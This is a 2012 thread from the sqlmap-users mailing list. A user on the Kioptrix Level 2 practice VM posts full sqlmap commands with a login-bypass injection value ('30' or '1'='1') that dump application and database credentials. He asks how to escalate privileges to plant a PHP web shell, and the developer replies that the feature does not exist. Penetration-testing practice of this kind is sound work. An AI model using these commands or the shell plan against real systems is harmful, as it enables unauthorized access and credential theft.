Hi Phaedrus.
Sorry, for the time being there is no such mechanism inside sqlmap. Also,
once implemented it will most certainly be limited to only MSSQL and Oracle
(http://www.abysssec.com/blog/2008/10/16/ms-sql-injection-privilege-scalation/ &
http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/).
Kind regards,
Miroslav Stampar
On Fri, Jan 13, 2012 at 5:02 AM, Phaedrus Black <phaedrus.bl...@gmail.com> wrote:
> hello:
>
> I discovered a vulnerability that allows me to bypass the login screen.
> btw this is the Kioptrix Level 2 puzzle and not a live client/target.
>
> I've managed to dump credentials for the administrator's web interface in
> addition to the database users themselves. There were a few recon commands
> but the meatiest items are below.
>
> Specific commands included:
>
> >sudo python sqlmap.py -u "http://192.168.1.1"
> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
> --string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <---
> gets me user credentials for the webapp
>
> >sudo python sqlmap.py -u "http://192.168.1.1"
> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
> --string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me
> user credentials for the DB.
>
> However, I've discovered that the db user that I am running as does
> **not** have the appropriate privileges to write
> files to the system.
>
> My objective is to write something like phpshell to the /var/www directory
> and go from there.
>
> Is there a way for sqlmap to switch from unprivileged user A to privileged
> user B if I have both sets of credentials? If so, I can then use the
> "file-write" and "file-dest" options.
>
> thanks,
>
> -pb
>
> ------------------------------------------------------------------------------
> RSA(R) Conference 2012
> Mar 27 - Feb 2
> Save $400 by Jan. 27
> Register now!
> http://p.sf.net/sfu/rsa-sfdev2dev2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm